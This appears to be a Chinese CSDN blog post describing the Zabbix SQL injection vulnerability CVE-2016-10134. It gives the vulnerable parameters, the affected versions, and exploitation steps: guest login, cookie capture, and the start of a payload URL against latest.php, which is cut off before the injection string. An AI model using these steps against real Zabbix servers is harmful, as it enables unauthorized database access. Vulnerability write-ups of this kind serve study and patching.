zabbix SQL注入漏洞(CVE-2016-10134)

本文详细介绍了zabbix的SQL注入漏洞(CVE-2016-10134),涉及前端jsrpc.php的profileIdx2参数和后端latest.php的toggle_ids[]参数。该漏洞影响Zabbix 2.2.14之前的版本及3.0~3.0.4版本。攻击者可能利用此漏洞进行恶意操作,例如通过guest账户登录并利用抓包篡改请求参数,触发SQL注入。若无法后台访问,也可通过前端jsrpc.php发起注入攻击。
摘要由CSDN通过智能技术生成

漏洞详情

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。前端页面jsrpc.php的参数profileIdx2以及后端latest.php页面中的参数toggle_ids[]存在SQL注入,攻击者可以通过此漏洞

漏洞影响

Zabbix 2.2.14之前

Zabbix 3.0~3.0.4

漏洞利用

如果可以使用guest用户进行登陆,那么可以通过账号为guest密码为空进入后台,通过抓包记住自己cookie

将这16个字符作为sid的值,访问如下payload:

http://192.168.30.128:8080/latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值